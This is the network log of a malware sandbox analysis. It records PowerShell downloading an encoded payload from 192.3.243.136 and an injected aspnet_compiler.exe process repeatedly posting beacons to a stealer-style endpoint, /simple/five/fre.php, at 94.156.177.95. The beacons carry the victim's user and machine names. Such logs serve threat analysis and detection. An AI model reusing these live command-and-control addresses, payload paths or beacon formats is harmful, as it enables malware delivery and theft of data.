Nov 15, 2024 18:14:06.307126045 CET	1236	IN	Data Raw: 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 34 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 53 00 74 00 22 00 0d Data Ascii: ipar = enfollipar & "4JLACVWQNFKGXDEPSt" enfollipar = enfollipar & "rJLACVWQNFKGXDEPingJLACVWQNFKGXDEP($"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	192.3.243.136	80	5820	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:26.465945005 CET	75	OUT	GET /33/LOGLK.txt HTTP/1.1 Host: 192.3.243.136 Connection: Keep-Alive
Nov 15, 2024 18:14:27.125089884 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 17:14:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 15 Nov 2024 07:13:58 GMT ETag: "22aac-626ee4f8ac68f" Accept-Ranges: bytes Content-Length: 141996 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125200033 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125272989 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125325918 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125375032 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125441074 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125488997 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125540018 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125587940 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.125638962 CET	1236	IN	Data Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39 Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nov 15, 2024 18:14:27.130619049 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsxGZuIzMUVVQFx0TAwGbk5iMzUGbvBAAlNmbhR3culUZ0FWZyN0bDBAEAAQZ6lGbhlGdp5WauV1bDBAbAAQZ6lGbhlGdp5WSvNEA+AAAsxGZuIzMMVkTSV0SAAAc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:28.583125114 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 176 Connection: close
Nov 15, 2024 18:14:28.588136911 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones888683JONES-PCk0FDD42EE188E931437F4FBE2CDybPc
Nov 15, 2024 18:14:29.538896084 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:29.691334963 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 176 Connection: close
Nov 15, 2024 18:14:29.696597099 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones888683JONES-PC+0FDD42EE188E931437F4FBE2C1T2R5
Nov 15, 2024 18:14:30.671838045 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:30.789119005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:30.795104027 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:31.757117987 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:31.914752960 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:31.919894934 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:32.888520002 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:33.052884102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:33.059120893 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:34.033890963 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:34.174204111 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:34.179210901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:35.158873081 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:35.320996046 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:35.327061892 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:36.284205914 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:36.464710951 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:36.470587015 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:37.438709974 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:37.607319117 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:37.613187075 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:38.600548983 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:38.762506008 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:38.767432928 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:39.761516094 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:39.910825968 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:14:39.915788889 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:40.866601944 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
